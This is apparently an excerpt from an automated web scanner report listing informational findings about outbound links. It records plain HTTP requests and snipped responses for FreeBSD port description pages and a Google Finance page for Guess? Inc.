WWW: <A HREF="http://www.lost.org.uk/snews.html">http://www.lost.org.uk/snews.html</A>
...[SNIP]...

20.649. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/bgrab/pkg-descr
The response contains the following links to other domains:
  • http://bgrab.ifip.net/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/bgrab/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:17 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
This is an automated binary extraction tool for UseNet newsgroups.
It will log into any newsgroup and download all the binary files.

WWW: <A HREF="http://bgrab.ifip.net/">http://bgrab.ifip.net/</A>
...[SNIP]...

20.650. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/mail/alpine/pkg-descr
The response contains the following links to other domains:
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/
  • http://www.washington.edu/alpine/

Request

GET /cgi/url.cgi?ports/mail/alpine/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:16 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7398

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
n-line, context-sensitive help screens.

Alpine supports MIME (Multipurpose Internet Mail Extensions), an Internet
Standard for representing multipart and multimedia data in email.

LICENSE: ASL

WWW: <A HREF="http://www.washington.edu/alpine/">http://www.washington.edu/alpine/</A>
...[SNIP]...

20.651. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/pgpmoose/pkg-descr
The response contains the following links to other domains:
  • http://people.qualcomm.com/ggr/pgpmoose.html
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/pgpmoose/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:26 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
itten by Phil Zimmermann &lt;prz@acm.org>, who
otherwise has nothing to do with this. The
cryptographic framework was written by Greg Rose
&lt;ggr@usenix.org>, as were the INN news system hooks.

WWW: <A HREF="http://people.qualcomm.com/ggr/pgpmoose.html">http://people.qualcomm.com/ggr/pgpmoose.html</A>
...[SNIP]...

20.652. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/newsfish/pkg-descr
The response contains the following links to other domains:
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/
  • http://www.saddi.com/software/newsfish/

Request

GET /cgi/url.cgi?ports/news/newsfish/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:05 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
lying a set of regular
expressions (a la grep/egrep) to the headers of each article.

Articles are saved in mailbox format, which makes them suitable for
viewing under most popular mail readers.

WWW: <A HREF="http://www.saddi.com/software/newsfish/">http://www.saddi.com/software/newsfish/</A>
...[SNIP]...

20.653. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/newsgrab/pkg-descr
The response contains the following links to other domains:
  • http://newsgrab.sourceforge.net/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/newsgrab/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:07 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
Based on a given regular expression and news group, newsgrab will
connect to your NNTP server and download all the binaries in articles
that match the given regexp and uudecode them.

WWW: <A HREF="http://newsgrab.sourceforge.net/">http://newsgrab.sourceforge.net/</A>
...[SNIP]...

20.654. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/lusernet/pkg-descr
The response contains the following links to other domains:
  • http://web.telia.com/~u42308495/alex/LuserNET/LuserNET.html
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/lusernet/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:58 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
LuserNET is an NNTP-based news reader for GNUstep.

LICENSE: GPL2

WWW: <A HREF="http://web.telia.com/~u42308495/alex/LuserNET/LuserNET.html">http://web.telia.com/~u42308495/alex/LuserNET/LuserNET.html</A>
...[SNIP]...

20.655. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/py-pynzb/pkg-descr
The response contains the following links to other domains:
  • http://pypi.python.org/pypi/pynzb/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/py-pynzb/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:27 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
rs.

Since NZB is XML-based, it's relatively easy to build one-off parsers
to parse NZB files. This project is an attempt to consolidate those
many one-off NZB parsers into one simple interface.

WWW: <A HREF="http://pypi.python.org/pypi/pynzb/">http://pypi.python.org/pypi/pynzb/</A>
...[SNIP]...

20.656. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/mail/claws-mail/pkg-descr
The response contains the following links to other domains:
  • http://www.claws-mail.org/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/mail/claws-mail/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:20 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6764

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
ernalization, and more.

In addition to the above, Claws Mail has a lot of extra features,
e.g. a plugin mechanism, a new filtering/processing mechanism,
extra folder properties and much more...

WWW: <A HREF="http://www.claws-mail.org/">http://www.claws-mail.org/</A>
...[SNIP]...

20.657. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/aub/pkg-descr
The response contains the following links to other domains:
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/
  • http://yukidoke.org/~mako/projects/aub/

Request

GET /cgi/url.cgi?ports/news/aub/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:17 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
ready, so that it does not waste time rebuilding the same binaries
over and over again.

run: ``aub -M | more'' for the long form documentation, or
``aub -m | more'' for the short form.

WWW: <A HREF="http://yukidoke.org/~mako/projects/aub/">http://yukidoke.org/~mako/projects/aub/</A>
...[SNIP]...

20.658. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/cleanfeed/pkg-descr
The response contains the following links to other domains:
  • http://www.exit109.com/~jeremy/news/cleanfeed.html
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/cleanfeed/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:24 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
ill continue releasing new versions until I get tired
or somebody else will step forward.

There is no real documentation, so if you never used cleanfeed please
download the original package from
WWW: <A HREF="http://www.exit109.com/~jeremy/news/cleanfeed.html">http://www.exit109.com/~jeremy/news/cleanfeed.html</A>
...[SNIP]...

20.659. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/p5-NNML/pkg-descr
The response contains the following links to other domains:
  • http://search.cpan.org/dist/NNML/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/p5-NNML/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:16 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
s a minimal NNTP server. It is (hope-)
fully conformant to rfc977. In addition the commands XOVER and
AUTHINFO are implemented.

Author:    Ulrich Pfeifer &lt;pfeifer@ls6.informatik.uni-dortmund.de>
WWW:    <A HREF="http://search.cpan.org/dist/NNML/">http://search.cpan.org/dist/NNML/</A>
...[SNIP]...

20.660. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/mail/lmtp2nntp/pkg-descr
The response contains the following links to other domains:
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/
  • http://www.ossp.org/pkg/tool/lmtp2nntp/

Request

GET /cgi/url.cgi?ports/mail/lmtp2nntp/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:56 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
ovide a fully
reliable service. For this the program returns proper delivery status
notification which indi- cates successful completed action, persistent
transient failure or permanent failure.

WWW: <A HREF="http://www.ossp.org/pkg/tool/lmtp2nntp/">http://www.ossp.org/pkg/tool/lmtp2nntp/</A>
...[SNIP]...

20.661. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/yydecode/pkg-descr
The response contains the following links to other domains:
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/
  • http://yydecode.sf.net/

Request

GET /cgi/url.cgi?ports/news/yydecode/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:45 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
ecode's
functionality, (ie. decodes standard uuencoded files, as well as Base64
[RFC2045] encoded files produced by uuencode) and hence can be used as a
drop-in replacement in all circumstances.

WWW: <A HREF="http://yydecode.sf.net/">http://yydecode.sf.net/</A>
...[SNIP]...

20.662. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/ubh/pkg-descr
The response contains the following links to other domains:
  • http://ubh.sourceforge.net/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/ubh/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:42 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
, Active Perl
on Win32 platforms, and Mac OS X. Requires Net::NNTP and
News::Newsrc
(which itself requires Set::IntSpan), MIME::Parser, MIME::Base64,
IO::Stringy, and MailTools (distribution).

WWW: <A HREF="http://ubh.sourceforge.net/">http://ubh.sourceforge.net/</A>
...[SNIP]...

20.663. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/pan/pkg-descr
The response contains the following links to other domains:
  • http://pan.rebelbase.com/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/pan/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:24 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
vanced users alike. It has all the typical
features found in newsreaders, and also supports offline reading, multiple
connections, and a number of features for power users and alt.binaries fans.

WWW: <A HREF="http://pan.rebelbase.com/">http://pan.rebelbase.com/</A>
...[SNIP]...

20.664. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/golded+/pkg-descr
The response contains the following links to other domains:
  • http://golded-plus.sourceforge.net/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/golded+/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:34 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
GoldED+ (FTN message editor)

GoldED+ is a succesor of the well-known GoldED Fidonet Mail Reader.

WWW: <A HREF="http://golded-plus.sourceforge.net/">http://golded-plus.sourceforge.net/</A>
...[SNIP]...

20.665. http://www.google.com/finance

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /finance

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.google.com/finance?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=we
The response contains the following links to other domains:
  • http://annualreports.com/partners/Report/21590
  • http://daytradingstockblog.blogspot.com/2011/01/mid-caps-nvda-fslr-lulu-akam-slw.html
  • http://finance.yahoo.com/q/rr?s=GES
  • http://google.brand.edgar-online.com/?sym=GES
  • http://googlefinanceblog.blogspot.com/
  • http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-govBoard
  • http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-irhome
  • http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-news&nyo=0
  • http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-sec
  • http://moneycentral.msn.com/investor/invsub/ownership/ownership.asp?Symbol=GES
  • http://stocks.us.reuters.com/stocks/fullDescription.asp?rpc=66&symbol=GES
  • http://stocks.us.reuters.com/stocks/officersDirectors.asp?symbol=GES&WTmodLOC=C4-Officers-5
  • http://topstockspick.blogspot.com/2011/01/analyst-recommendation-strong-buy-rated_3972.html
  • http://web.servicebureau.net/conf/meta?i=1113214965&c=2343&m=was&u=/w_ccbn.xsl&date_ticker=GES
  • http://www.dailyfinance.com/event/GES/usa
  • http://www.google.ca/finance
  • http://www.guess.com/worldofguess/
  • http://www.guess.eu/
  • http://www.marketwatch.com/tools/quotes/snapshot.asp?symb=GES&pg=analyst
  • http://www.nasd100.com/2011/01/top-large-cap-stocks-with-highest-upside-potential-jan-24-2011.html
  • http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=1187892
  • http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=1520152
  • http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=165946
  • http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=340038
  • http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=3580
  • http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=3581
  • http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=777470
  • http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=777476
  • http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=806374
  • http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=828372
  • http://www.youtube.com/results?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=e1

Request

GET /finance?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=we HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
X-UA-Compatible: IE=EmulateIE7
Date: Mon, 24 Jan 2011 16:39:59 GMT
Expires: Mon, 24 Jan 2011 16:39:59 GMT
Cache-Control: private, max-age=0
Set-Cookie: SC=RV=659099:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Guess?, Inc.: NYSE:GES quotes & news - Google Finance</title>
<meta name="Description" c
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=e1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<div>Q3 2011 Earnings Conference Call -
<a onclick="_GF_click('', 'webcast', 'GES', '')" href="http://web.servicebureau.net/conf/meta?i=1113214965&amp;c=2343&amp;m=was&amp;u=/w_ccbn.xsl&amp;date_ticker=GES" class=time>
<img alt="Webcast" src="/finance/s/m4C5KaofCbA/images/cleardot.gif"
width=19 height=16 class=SP_webcast id=webcast>
...[SNIP]...
<td>
<a href="http://www.dailyfinance.com/event/GES/usa" >
More events from DailyFinance &raquo;</a>
...[SNIP]...
<br>
<a id=fs-chome href="http://www.guess.eu/" >
http://www.guess.eu/
</a>
...[SNIP]...
<div class=item><a id=fs- href="http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-news&nyo=0" >News Releases</a>
...[SNIP]...
<div class=item><a id=fs- href="http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-irhome" >Investor Relations</a>
...[SNIP]...
<div class=item><a id=fs- href="http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-sec" >Financial Information</a>
...[SNIP]...
<div class=item><a id=fs- href="http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-govBoard" >Executives</a>
...[SNIP]...
<div class=item><a id=fs- href="http://www.guess.com/worldofguess/" >Products/Services</a>
...[SNIP]...
<div class=item><a id=m-analyst
href=http://www.marketwatch.com/tools/quotes/snapshot.asp?symb=GES&pg=analyst >
Analyst Estimates</a>
...[SNIP]...
<div class=item><a id=m-sec
href=http://google.brand.edgar-online.com?sym=GES >
SEC Filings</a>
...[SNIP]...
<div class=item><a id=m-hold
href=http://moneycentral.msn.com/investor/invsub/ownership/ownership.asp?Symbol=GES >
Major Holders</a>
